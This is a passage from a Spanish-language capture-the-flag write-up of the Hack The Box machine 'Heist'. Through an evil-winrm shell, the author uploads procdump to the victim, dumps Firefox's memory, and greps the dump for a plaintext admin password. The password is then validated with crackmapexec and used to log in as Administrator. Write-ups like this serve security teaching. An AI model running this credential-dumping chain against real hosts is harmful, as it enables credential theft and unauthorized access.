230 12 3092 13584 4928 1 svchost
365 18 5612 27016 4952 1 svchost
249 14 3076 13632 5068 0 svchost
122 7 1232 5496 5192 0 svchost
163 9 3064 7620 5316 0 svchost
115 7 1272 5364 6616 0 svchost
223 11 2828 10900 6872 0 svchost
311 16 15248 17224 6876 0 svchost
1877 0 192 96 4 0 System
210 20 3984 12316 4988 1 taskhostw
167 11 2944 10784 2632 0 VGAuthService
142 8 1688 6756 2688 0 vm3dservice
136 9 1804 7280 2976 1 vm3dservice
384 22 10012 22352 2696 0 vmtoolsd
236 18 5088 15136 5584 1 vmtoolsd
171 11 1484 6820 468 0 wininit
282 13 2704 12892 532 1 winlogon
339 15 9284 19288 3932 0 WmiPrvSE
1464 28 109968 129332 1.94 7088 0 wsmprovhost
Como el firefox está corriendo podemos crear un dump del proceso para ver si obtenemos credenciales usando https://learn.microsoft.com/es-es/sysinternals/downloads/procdump. Una vez descargado y depositado en la ruta en la que hemos iniciado la conexión con evil-winrm subimos el archivo a la máquina víctima
1
2
3
4
5
6
7
*Evil-WinRM* PS C:\Windows\Temp\Privesc> upload procdump64.exe
Info: Uploading /home/justice-reaper/Desktop/Heist/content/procdump64.exe to C:\Windows\Temp\Privesc\procdump64.exe
Data: 566472 bytes of 566472 bytes copied
Info: Upload successful!
Listamos los PID's del proceso de firefox
1
2
3
4
5
6
*Evil-WinRM* PS C:\> ps | findstr firefox
1060 71 152672 230480 5.14 788 1 firefox
347 19 10228 38556 0.05 4212 1 firefox
401 34 35588 95060 0.72 6248 1 firefox
378 28 22952 59920 0.28 6444 1 firefox
355 25 16428 38760 0.13 6688 1 firefox
Dumpeamos las credenciales del proceso
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Windows\Temp\Privesc> ./procdump64.exe -accepteula 788 -ma
ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[05:21:21] Dump 1 initiated: C:\Windows\Temp\Privesc\firefox.exe_240802_052121.dmp
[05:21:21] Dump 1 writing: Estimated dump file size is 510 MB.
[05:21:24] Dump 1 complete: 510 MB written in 2.8 seconds
[05:21:24] Dump count reached.
*Evil-WinRM* PS C:\Windows\Temp\Privesc> download C:\Windows\Temp\Privesc\firefox.exe_240802_052121.dmp
Info: Downloading C:\Windows\Temp\Privesc\firefox.exe_240802_052121.dmp to firefox.exe_240802_052121.dmp
Progress: 2% : |▒░░░░░░░░░░|
Esto se está descargando en el mismo directorio donde iniciamos la conexión a través de evil-winrm. No hace falta esperarnos a que se complete la descarga, podemos filtrar por password obteniendo así la contraseña del usuario admin
1
2
3
4
# strings firefox.exe_240802_052121.dmp | grep password
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
Validamos la credencial obtenida
1
2
3
4
# crackmapexec winrm 10.129.187.132 -u 'Administrator' -p '4dD!5}x/re8]FBuZ'
SMB 10.129.187.132 5985 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
HTTP 10.129.187.132 5985 SUPPORTDESK [*] http://10.129.187.132:5985/wsman
WINRM 10.129.187.132 5985 SUPPORTDESK [+] SupportDesk\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)
Nos conectamos a la máquina víctima
1
2
3
4
5
6
7
8
9
10
11
# evil-winrm -u 'Administrator' -p '4dD!5}x/re8]FBuZ' -i 10.129.187.132
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
supportdesk\administrator
Esta entrada está licenciada bajo CC BY 4.0 por el autor.